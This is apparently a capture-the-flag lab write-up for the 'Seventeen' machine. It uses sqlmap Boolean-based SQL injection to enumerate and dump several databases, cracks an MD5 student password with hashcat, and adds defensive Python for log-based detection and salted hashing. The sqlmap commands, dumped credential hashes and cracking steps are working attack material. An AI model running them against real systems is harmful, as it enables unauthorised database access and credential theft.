Boolean Based SQL Injection


The target web application was confirmed to be vulnerable to SQLi. As reviewed previously, performing a manual Boolean-based SQL injection would be extremely time-consuming, since every character of every value has to be inferred from a true/false difference in the page. Therefore, I will be using sqlmap for convenience.
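Seen from the defender's side, that character-by-character inference leaves a distinctive trail in the web server log. The following Python is an added example, not part of the original writeup: it parses constructed Apache-style access log lines (IPs, timestamps and the alert threshold are assumptions) and flags clients that send Boolean-shaped values into a parameter such as the id parameter targeted here.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log (not from the original page): one client
# probing the exam.seventeen.htb "id" parameter the way a Boolean-blind run does
# (a true/false pair, then per-character comparisons), plus ordinary traffic.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Jun/2023:01:01:01 +0000] "GET /?p=take_exam&id=1 HTTP/1.1" 200 5120
10.10.14.5 - - [20/Jun/2023:01:01:02 +0000] "GET /?p=take_exam&id=1%20AND%205846%3D5846 HTTP/1.1" 200 5120
10.10.14.5 - - [20/Jun/2023:01:01:02 +0000] "GET /?p=take_exam&id=1%20AND%205846%3D5847 HTTP/1.1" 200 3104
10.10.14.5 - - [20/Jun/2023:01:01:03 +0000] "GET /?p=take_exam&id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C1%2C1%29%29%3E64 HTTP/1.1" 200 5120
10.10.14.5 - - [20/Jun/2023:01:01:03 +0000] "GET /?p=take_exam&id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C1%2C1%29%29%3E96 HTTP/1.1" 200 3104
10.10.14.9 - - [20/Jun/2023:01:01:05 +0000] "GET /?p=take_exam&id=2 HTTP/1.1" 200 5133
10.10.14.9 - - [20/Jun/2023:01:01:06 +0000] "GET /?p=exams HTTP/1.1" 200 7001
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$')
# Boolean-blind inference leaves either a tautology/contradiction pair (AND 5846=5846
# versus AND 5846=5847) or a comparison on one extracted character in the parameter.
BOOL_RE = re.compile(r"(?i)\b(and|or)\b\s*(\d+\s*[=<>]\s*\d+|ord\(|ascii\(|substr|mid\()")

def parse_line(line):
    """Return the fields of one log line plus its percent-decoded query parameters."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    query = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    rec["params"] = {k: v[0] for k, v in query.items()}
    return rec

def find_boolean_blind(log_text, threshold=3):
    """Group Boolean-shaped values by (client IP, parameter) and keep the groups with
    at least `threshold` probes; the distinct response sizes are recorded because
    blind inference depends on a true/false difference in the returned page."""
    hits = defaultdict(lambda: {"values": [], "sizes": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"].items():
            if BOOL_RE.search(value):
                hit = hits[(rec["ip"], name)]
                hit["values"].append(value)
                hit["sizes"].add(rec["bytes"])
    return {key: hit for key, hit in hits.items() if len(hit["values"]) >= threshold}
```

A group whose probes come back in exactly two response sizes, as in the sample, is the strongest signal: that is the true/false oracle the technique relies on.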

Current User


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --batch --technique B --current-user
 
[...REDACTED...]
 
[22:38:24] [INFO] fetching current user
[22:38:24] [INFO] retrieved: mysqluser@%
current user: 'mysqluser@%'
 
[...REDACTED...]

The current user appears to be the default, mysqluser@%.

DBs


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --batch --technique B --dbs --current-db
 
[...REDACTED...]
 
[22:39:37] [INFO] fetching current database
[22:39:37] [INFO] resumed: erms_db
current database: 'erms_db'
[22:39:37] [INFO] fetching database names
[22:39:37] [INFO] fetching number of databases
[22:39:37] [INFO] resumed: 4
[22:39:37] [INFO] resumed: information_schema
[22:39:37] [INFO] resumed: db_sfms
[22:39:37] [INFO] resumed: erms_db
[22:39:37] [INFO] resumed: roundcubedb
available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb
 
[...REDACTED...]

There are 4 DBs:

  • db_sfms
  • erms_db
  • information_schema
  • roundcubedb

While the information_schema DB is the default and the erms_db DB is expected, db_sfms and roundcubedb are not expected at all.

roundcubedb is the default DB used by the Roundcube mail client, whereas db_sfms seems to be used by a Student File Management System, another web application similar to the target web application.

The erms_db DB is the current DB of the Exam Reviewer Management System application.

erms_db


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --batch --technique B --tables -D erms_db
 
[...REDACTED...]
 
Database: erms_db
[6 tables]
+---------------+
| category_list |
| exam_list     |
| option_list   |
| question_list |
| system_info   |
| users         |
+---------------+
 
[...REDACTED...]

There are 6 tables within the erms_db DB. The erms_db.users table appears to be the most promising.

erms_db.users


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -T users --dump
 
[...REDACTED...]
 
database: erms_db
table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar                            | lastname | password                         | username         | firstname    | date_added          | last_login | date_updated        |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1  | 1    | ../oldmanagement/files/avatar.png | admin    | fc8ec7b43523e186a27f46957818391c | admin            | adminstrator | 2021-01-20 14:02:37 | NULL       | 2022-02-24 22:00:15 |
| 6  | 2    | ../oldmanagement/files/avatar.png | anthony  | 48bb86d036bb993dfdcf7fefdc60cc06 | undetectablemark | mark         | 2021-09-30 16:34:02 | NULL       | 2022-05-10 08:21:39 |
| 7  | 2    | ../oldmanagement/files/avatar.png | smith    | 184fe92824bea12486ae9a56050228ee | stev1992         | steven       | 2022-02-22 21:05:07 | NULL       | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
 
[...REDACTED...]

Dumping the erms_db.users table retrieves user credentials with password hashes:

  • admin:fc8ec7b43523e186a27f46957818391c
  • undetectablemark:48bb86d036bb993dfdcf7fefdc60cc06
  • stev1992:184fe92824bea12486ae9a56050228ee

I am unable to crack the password hashes. Additionally, Admin Login was not available.

erms_db.system_info


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -T system_info --dump
 
[...REDACTED...]
 
Database: erms_db
Table: system_info
[5 entries]
+----+-------------+-------------------------------------------+
| id | meta_field  | meta_value                                |
+----+-------------+-------------------------------------------+
| 1  | name        | Seventeen Exam Reviewer Management System |
| 6  | short_name  | Examination Management System             |
| 11 | logo        | uploads/l.jpg                             |
| 13 | user_avatar | uploads/user_avatar.jpg                   |
| 14 | cover       | uploads/1644023580_wallpaper.jpg          |
+----+-------------+-------------------------------------------+
 
[...REDACTED...]

db_sfms


As mentioned above, the presence of the db_sfms DB suggests that an instance of the Student File Management System is running.

┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D db_sfms --tables
 
[...REDACTED...]
 
database: db_sfms
[3 tables]
+---------+
| user    |
| storage |
| student |
+---------+
 
[...REDACTED...]

There are 3 tables within the db_sfms DB.

db_sfms.user


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D db_sfms -T user --dump
 
[...REDACTED...]
 
Database: db_sfms
Table: user
[3 entries]
+---------+---------------+---------------+----------------------------------+------------------+---------------+
| user_id | status        | lastname      | password                         | username         | firstname     |
+---------+---------------+---------------+----------------------------------+------------------+---------------+
| 1       | administrator | Administrator | fc8ec7b43523e186a27f46957818391c | admin            | Administrator |
| 2       | Regular       | Anthony       | b35e311c80075c4916935cbbbd770cef | UndetectableMark | Mark          |
| 4       | Regular       | Smith         | 112dd9d08abf9dcceec8bc6d3e26b138 | Stev1992         | Steven        |
+---------+---------------+---------------+----------------------------------+------------------+---------------+
 
[...REDACTED...]

The db_sfms.user table contains the same usernames as the erms_db.users table earlier, but there are some differences in the password hashes:

  • admin:fc8ec7b43523e186a27f46957818391c
  • UndetectableMark:b35e311c80075c4916935cbbbd770cef
  • Stev1992:112dd9d08abf9dcceec8bc6d3e26b138

Nevertheless, these hashes are not crackable.

db_sfms.storage


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D db_sfms -T storage --dump
 
[...REDACTED...]
 
database: db_sfms
table: storage
[1 entry]
+----------+---------+----------------------+-----------------+----------------------+
| store_id | stud_no | filename             | file_type       | date_uploaded        |
+----------+---------+----------------------+-----------------+----------------------+
| 33       | 31234   | marksheet-finals.pdf | application/pdf | 2020-01-26, 06:57 PM |
+----------+---------+----------------------+-----------------+----------------------+
 
[...REDACTED...]

The db_sfms.storage table contains a single entry, a PDF file (marksheet-finals.pdf) uploaded for student 31234.

db_sfms.student


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D db_sfms -T student --dump 
 
[...REDACTED...]
 
Database: db_sfms
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password                                           | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1       | 1A | Male   | 12345   | Smith    | 1a40620f9a4ed6cb8d81a1d365559233                   | John      |
| 2       | 2B | Male   | 23347   | Mille    | abb635c915b0cc296e071e8d76e9060c                   | James     |
| 3       | 2C | Female | 31234   | Shane    | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly     |
| 4       | 3C | Female | 43347   | Hales    | a1428092eb55781de5eb4fd5e2ceb835                   | Jamie     |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
 
[...REDACTED...]

The db_sfms.student table contains the credentials of the enrolled students. Those names match the students present in the testimonials earlier.

Student 31234 has an interesting string in the password field: (autodestruction)

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ hashcat -a 0 -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
hashes: 10 digests; 10 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
a2afa567b1efdb42d8966353337d9024:autodestruction          
 
session..........: hashcat
status...........: Exhausted
hash.mode........: 0 (MD5)
hash.target......: hashes.txt
time.started.....: Tue Jun 20 01:02:04 2023 (5 secs)
time.estimated...: Tue Jun 20 01:02:09 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:  3216.5 kH/s (0.22ms) @ Accel:512 Loops:1 Thr:1 Vec:8
recovered........: 1/10 (10.00%) Digests (total), 1/10 (10.00%) Digests (new)
progress.........: 14344385/14344385 (100.00%)
rejected.........: 0/14344385 (0.00%)
restore.point....: 14344385/14344385 (100.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
hardware.mon.#1..: Util: 28%

The password hash for student 31234 is cracked: autodestruction.
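The hashcat run confirms mode 0, raw unsalted MD5, and the dumps above already show why that matters: the admin digest is byte-for-byte identical in erms_db.users and db_sfms.user. As an added example (not from the original writeup), the following Python audits the dumped password fields for that weakness and shows the salted, slow replacement; the PBKDF2 parameters are an assumption, the digests are the page's own.

```python
import hashlib
import hmac
import os
import re

# Password fields as dumped above (values from the page's own tables), keyed by
# store so that cross-store reuse of an identical digest can be spotted.
STORES = {
    "erms_db.users": {"admin": "fc8ec7b43523e186a27f46957818391c",
                      "stev1992": "184fe92824bea12486ae9a56050228ee"},
    "db_sfms.user": {"admin": "fc8ec7b43523e186a27f46957818391c",
                     "Stev1992": "112dd9d08abf9dcceec8bc6d3e26b138"},
    "db_sfms.student": {"31234": "a2afa567b1efdb42d8966353337d9024"},
}

RAW_MD5_RE = re.compile(r"^[0-9a-f]{32}$")

def looks_unsalted_fast_hash(value):
    """A bare 32-hex digest is the shape hashcat mode 0 (raw MD5) cracked above:
    no salt and no cost parameter, so one wordlist pass covers every user."""
    return bool(RAW_MD5_RE.match(value))

def find_reuse(stores):
    """Digests that occur in more than one store. With a per-user salt two stores
    could never hold the same value, so a match proves unsalted hashing plus
    password reuse (the admin account here)."""
    seen = {}
    for store, rows in stores.items():
        for digest in rows.values():
            seen.setdefault(digest, set()).add(store)
    return {d: s for d, s in seen.items() if len(s) > 1}

def is_md5_of(plaintext, digest):
    """Confirm the pair recovered by hashcat without any wordlist."""
    return hmac.compare_digest(hashlib.md5(plaintext.encode()).hexdigest(), digest)

def hash_password(password, iterations=210_000):
    """Salted, slow replacement (assumed parameters): PBKDF2-HMAC-SHA256 with a
    random 16-byte salt, stored in a self-describing format."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

With the replacement scheme the same password yields a different stored value for every user, so neither the cross-store match nor a single hashcat pass over all ten digests would work.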

roundcubedb


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D roundcubedb --tables      
 
[...REDACTED...]
 
Database: roundcubedb
[14 tables]
+---------------------+
| session             |
| system              |
| cache               |
| cache_index         |
| cache_messages      |
| cache_shared        |
| cache_thread        |
| contactgroupmembers |
| contactgroups       |
| contacts            |
| dictionary          |
| identities          |
| searches            |
| users               |
+---------------------+
 
[...REDACTED...]

While there are 14 tables, the roundcubedb.users table appears the most valuable.

The presence of the roundcubedb DB also indicates that a Roundcube instance is running somewhere.

roundcubedb.users


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D roundcubedb -T users --dump
 
[...REDACTED...]
 
database: roundcubedb
table: users
[1 entry]
+---------+---------------------+------------+-----------+------------+---------------------+-------------------------------------------------------------------+---------------------+----------------------+
| user_id | created             | username   | mail_host | language   | last_login          | preferences                                                       | failed_login        | failed_login_counter |
+---------+---------------------+------------+-----------+------------+---------------------+-------------------------------------------------------------------+---------------------+----------------------+
| 1       | 2022-03-19 21:30:30 | smtpmailer | localhost | en_US      | 2022-03-22 13:41:05 | a:1:{s:11:"client_hash";s:32:"0db936ce29d4c4d2a2f82db8b3d7870c";} | 2022-03-23 15:32:37 | 3                    |
+---------+---------------------+------------+-----------+------------+---------------------+-------------------------------------------------------------------+---------------------+----------------------+
 
[...REDACTED...]

smtpmailer:0db936ce29d4c4d2a2f82db8b3d7870c

Unable to crack the password hash.

roundcubedb.system


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D roundcubedb -T system --dump
 
[...REDACTED...]
 
Database: roundcubedb
Table: system
[1 entry]
+-------------------+------------+
| name              | value      |
+-------------------+------------+
| roundcube-version | 2015111100 |
+-------------------+------------+
 
[...REDACTED...]